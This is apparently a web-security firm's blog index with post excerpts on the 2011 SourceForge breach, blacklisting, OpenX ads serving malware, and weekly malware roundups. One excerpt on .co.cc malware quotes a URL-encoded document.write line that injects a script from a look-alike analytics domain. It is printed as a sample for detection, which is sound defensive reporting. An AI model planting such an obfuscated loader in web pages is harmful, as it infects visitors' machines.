SourceForge.net servers compromised

If you have an account on SourceForge, or host any project in there, we recommend that change your password ASAP (especially if you re-use it somewhere else). Plus, if you host anything on their servers, make sure all of your files are clean and have not been modified.

The team at SourceForge posted that they have been hacked and multiple servers compromised: http://sourceforge.net/apps/wordpress/sourceforge/2011/01/27/sourceforge-net-attack-update/.

As we mentioned yesterday, we have discovered that sourceforge.net was attacked and several servers were compromised.

From one perspective a lot has changed since then: We understand more about what happened, and what we can do to prevent it from happening again.

From another perspective not much has changed: We’re doing the same things as we were last night: working to chart the full extent of the attack, to validate data against known good backups, and to protect the majority of our services.

CVS, ViewVC, file release uploads, and interactive shell services are still disabled while we do the work to make sure our servers and services are hardened against future attacks like this.


Read More

What to do when your site gets blacklisted

Most site owners only start to think about security when their site gets hacked (infected with malware) and blacklisted by Google.

So, here is what you need to do once you find out that your site is blacklisted:

*If you are registered with us already, don’t worry about it, just open a support request (we will take care of it).

Read More

Malware update: .co.cc malicious entries

For the last weeks (actually months), we’ve been tracking a large number of malware from .co.cc domains. It seems that every .co.cc domain we find is being used to host either malware or spam.

One of the techniques we are seeing to spread malware is by hiding the .co.cc domain encoded inside a javascript file. Something like this:

Document.write(unescape("%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%6F%6F%67%6C%65%2D%61%6E%61%6C%79%74%69%73%63%2E%63%6F%2E%63%63%2F%35%30%22%3E%3C%2F%73%63%72%69%70%74%3E"));

This malware is detected by our scanner as RKS5.

Another interesting thing about this malware is that it is only displayed to users running Windows and Internet explorer, since it has the following check:

Read More

Weekly malware update – 2010/Jan/14

Weekly malware update. You can track all updates by following our malware_updates category.

    *If your site has been affected with any of these issues, contact us at support@sucuri.net or visit http://sucuri.net to get help or if you want to share some information with us.

Astro (JS:431) – osCommerce attacks

For the last few weeks, this attack has been the most common, specially targetting osCommerce sites. The following code is added to the bottom of the infected pages:

Read More

OpenX.org serving malware?

We are tracking a few sites that are currently blacklisted and showing a warning from Google that openx.org (home of a popular open source ad server) is the site responsible for the infection:

2 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including openx.org/.

By looking at the diagnostic page for openx.org itself, it shows:

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, openx.org appeared to function as an intermediary for the infection of 82 site(s) including solovenezolanas.com/, thelocal.de/, drtuber.com/.

We are still tracking to see which ads are causing the issue, or if the openx servers themselves are compromised. If you include the tracking code from openx.org, we recommend that you check to see if there isn’t any malicious code being pushed to your users.

Alexa top sites – Blacklist for December/2010

Every month we analyze Alexa’s TOP 1 million site ranking and correlate that data with Google’s blacklist. Our goal is to get an overall view of the sites that are getting hacked, blacklisted, etc.

For Dec-2010, the number is pretty standard, but a little bit lower than previous months. Out of those top 1 million sites, around 2100 had their main domain blacklisted (2,099 to be more exact), a bitt lower than the roughly 2500 in November, and 3k on October. Out of the top 100k, more than 257 were blacklisted by Google.

Over time, only 636 sites that were blacklisted in previous months remain blacklisted, and in the TOP 1 million ranking.

Here are the top 100 sites that were flagged and their respective ranking (You can get the full list here):

Read More

Weekly malware update – 2010/Jan/07

Weekly malware update. You can track all updates by following our malware_updates category.

    *If your site has been affected with any of these issues, contact us at support@sucuri.net or visit http://sucuri.net to get help or if you want to share some information with us.


Read More